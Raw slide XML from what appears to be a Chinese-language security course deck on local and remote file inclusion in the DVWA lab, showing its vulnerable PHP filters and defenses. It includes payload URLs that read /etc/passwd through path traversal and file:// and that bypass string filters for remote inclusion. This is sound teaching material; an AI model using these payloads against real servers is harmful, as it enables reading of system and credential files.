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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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04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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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47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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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95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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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78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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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9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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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34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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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8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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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76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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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74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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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3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EF74-1257-46FC-9559-F7F9548276B5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1CF8-1DF0-4CAC-8AFB-9387D1169E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32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1EF74-1257-46FC-9559-F7F9548276B5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F1CF8-1DF0-4CAC-8AFB-9387D1169E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15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281881"/>
            <a:ext cx="9144000" cy="2001688"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/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Hacking and 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Exploitation_2_2</a:t>
            </a:r>
            <a:b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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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檔案存取</a:t>
            </a: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相關漏洞        實務測試</a:t>
            </a:r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Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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載</a:t>
            </a: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入</a:t>
            </a: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| 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Upload(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檔案上傳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b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 Inclusion(LFI)| </a:t>
            </a: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Remote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 Inclusion(RFI)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7419"/>
            <a:ext cx="9144000" cy="69494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216" y="4694172"/>
            <a:ext cx="2999492" cy="17862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7532" y="4512961"/>
            <a:ext cx="12346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講師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057" y="5128604"/>
            <a:ext cx="12346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助教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492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1550" y="1905000"/>
            <a:ext cx="5845190" cy="452288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31870" y="1905000"/>
            <a:ext cx="6326330" cy="3383280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451660" y="3268980"/>
            <a:ext cx="1567640" cy="9372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確實有漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="1099284"/>
            <a:ext cx="801624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http://192.168.1.250/DVWA/vulnerabilities/fi/? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>page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http://www.google.com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393101"/>
            <a:ext cx="9144000" cy="4883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/>
              <a:t>Remote File inclusion(RFI)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1647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65128"/>
            <a:ext cx="7886700" cy="788171"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞程式碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分析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989"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="321260" y="1357081"/>
            <a:ext cx="5878935" cy="258627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00050" y="414713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TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>// The page we wish to display </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$file = $_GET[ 'page' ]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>?&gt; 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00150" y="3623912"/>
            <a:ext cx="75438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800" dirty="0"/>
              <a:t>伺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>服器端對</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>參數沒有做任何的過濾跟檢查。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0595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3886457"/>
            <a:ext cx="7886700" cy="561976"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
        </p:spPr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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数過濾掉不該出現的咚咚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200" y="2319467"/>
            <a:ext cx="9144000" cy="1219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/>
              <a:t>如何避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>File inclusion vulnerability??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102133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2539"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="819151" y="1517967"/>
            <a:ext cx="7086600" cy="495903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327340"/>
            <a:ext cx="9144000" cy="891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/>
              <a:t>如何避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>File inclusion vulnerability??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5838827" y="1517967"/>
            <a:ext cx="2924519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DVWA_1.10_medium</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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6692" y="3048000"/>
            <a:ext cx="6417276" cy="7578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1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2924" y="1752601"/>
            <a:ext cx="7886700" cy="4005263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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>php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// The page we wish to display </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$file = $_GET[ 'page' ];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// Input validation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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array( "http://", "https://" ), </a:t>
            </a:r>
            <a:r>
              <a:rPr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""</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, $file ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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array( "../", "..\"" ), </a:t>
            </a:r>
            <a:r>
              <a:rPr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""</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, $file );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?&gt;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775017"/>
            <a:ext cx="9144000" cy="7346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如何避免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inclusion vulnerability??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="弧形箭號 (下彎) 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4543426" y="3371852"/>
            <a:ext cx="2428875" cy="5810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弧形箭號 (上彎) 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4152899" y="4752977"/>
            <a:ext cx="1604962" cy="4286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4813" y="6060190"/>
            <a:ext cx="827722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將”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 ”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、”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https://”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 ”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../”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、”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..\”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替換為空字元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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刪除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的意思</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29372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22" t="8172" r="19678" b="55491"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875" y="1825625"/>
            <a:ext cx="4895164" cy="218440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2"/>
            <a:ext cx="9144000" cy="87321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5400" dirty="0"/>
              <a:t>DEMO:: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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inclusion </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142877" y="1026254"/>
            <a:ext cx="4296817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DVWA_1.10_medium</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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447" y="3486768"/>
            <a:ext cx="6122910" cy="3180732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="內容版面配置區 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772027" y="3448048"/>
            <a:ext cx="4029075" cy="561976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</a:rPr>
              <a:t>這種</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>過濾功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>沒問題嗎</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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49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8615" y="3114929"/>
            <a:ext cx="7886700" cy="475615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/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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etc/passwd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8615" y="5203007"/>
            <a:ext cx="827151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http://192.168.1.250/DVWA/vulnerabilities/fi/?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page=ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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tp://google.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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4840" y="1456795"/>
            <a:ext cx="630936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http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>page=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file1.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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dirty="0"/>
              <a:t>測試是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>File inclusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>vulnerability[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>第二類攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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252084" y="1030651"/>
            <a:ext cx="60135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原本是要讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>webServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>file1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>來執行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158115" y="2586361"/>
            <a:ext cx="77069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/>
              <a:t>卻被不肖客用來讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>webServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>上的密碼檔</a:t>
            </a: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348615" y="4029783"/>
            <a:ext cx="7886700" cy="4756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dirty="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>page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../../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passwd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2085253"/>
            <a:ext cx="5543550" cy="4883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/>
              <a:t>Local File inclusion(LFI)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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2" y="4579233"/>
            <a:ext cx="6981825" cy="4883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/>
              <a:t>Remote  File inclusion(RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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348615" y="6052432"/>
            <a:ext cx="827151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http://192.168.1.250/DVWA/vulnerabilities/fi/?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page=http://google.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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向下箭號 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5419725" y="5605673"/>
            <a:ext cx="571500" cy="505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上-下雙向箭號 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5419725" y="3527171"/>
            <a:ext cx="285750" cy="48374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49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684853" y="2304950"/>
            <a:ext cx="4743350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"/>
            <a:ext cx="9144000" cy="87321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5400" dirty="0"/>
              <a:t>DEMO:: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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inclusion </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874563" y="5059513"/>
            <a:ext cx="4296817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DVWA_1.10_medium</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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224790" y="1112515"/>
            <a:ext cx="7886700" cy="4756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/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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etc/passwd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224790" y="2027369"/>
            <a:ext cx="7886700" cy="4756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dirty="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>page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../../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passwd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上-下雙向箭號 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295900" y="1524757"/>
            <a:ext cx="285750" cy="48374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812413" y="2743216"/>
            <a:ext cx="1567640" cy="9372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LFI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漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611395" y="2527951"/>
            <a:ext cx="4816808" cy="1236741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2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620455" y="2402273"/>
            <a:ext cx="4743350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"/>
            <a:ext cx="9144000" cy="87321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5400" dirty="0"/>
              <a:t>DEMO:: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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inclusion </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="984218"/>
            <a:ext cx="827151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http://192.168.1.250/DVWA/vulnerabilities/fi/?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page=ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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tp://google.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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8125" y="1833643"/>
            <a:ext cx="827151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http://192.168.1.250/DVWA/vulnerabilities/fi/?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page=http://google.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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向下箭號 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309235" y="1386884"/>
            <a:ext cx="571500" cy="505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624090" y="2986764"/>
            <a:ext cx="1567640" cy="9372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RFI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漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2500069" y="2351550"/>
            <a:ext cx="5172075" cy="2831909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59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3886458"/>
            <a:ext cx="7886700" cy="1057019"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="7030A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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>嚴格定義</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的檔案名稱是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>開頭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[file1.php,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file2.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file3.php ]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200" y="2319467"/>
            <a:ext cx="9144000" cy="1219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/>
              <a:t>如何避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>File inclusion vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>再加把</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179001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-142874" y="-57150"/>
            <a:ext cx="92868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smtClean="0"/>
              <a:t>File inclusion vulnerability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4441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0187"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="295277" y="1148489"/>
            <a:ext cx="7924257" cy="384333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9601" y="5153750"/>
            <a:ext cx="75051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// Input validation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if(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fnmatch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"file*", $file ) &amp;&amp; $file != "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include.php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    // This isn't the page we want! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    echo "ERROR: File not found!"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    exit; 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38337" y="4141780"/>
            <a:ext cx="714375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使用了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fnmatch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函數檢查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參數，要求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參數的開頭必須是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，伺服器才會去包含相應的檔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2"/>
            <a:ext cx="9144000" cy="87321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5400" dirty="0"/>
              <a:t>DEMO:: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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inclusion </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5610212" y="1148491"/>
            <a:ext cx="3533788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DVWA_1.10_high</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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5114927" y="2438393"/>
            <a:ext cx="4029075" cy="561976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</a:rPr>
              <a:t>這種</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>沒問題嗎</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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2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8615" y="3428811"/>
            <a:ext cx="7886700" cy="475615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/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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etc/passwd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4840" y="1456795"/>
            <a:ext cx="630936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http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>page=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file1.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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dirty="0"/>
              <a:t>測試是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>File inclusion vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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252084" y="1030651"/>
            <a:ext cx="60135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原本是要讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>webServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>file1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>來執行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158115" y="2782930"/>
            <a:ext cx="77069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/>
              <a:t>卻被不肖客用來讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>webServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>上的密碼檔</a:t>
            </a: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348615" y="4443680"/>
            <a:ext cx="7886700" cy="4756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dirty="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>page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=file:/</a:t>
            </a:r>
            <a:r>
              <a:rPr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/etc/passwd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2175702"/>
            <a:ext cx="5543550" cy="4883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/>
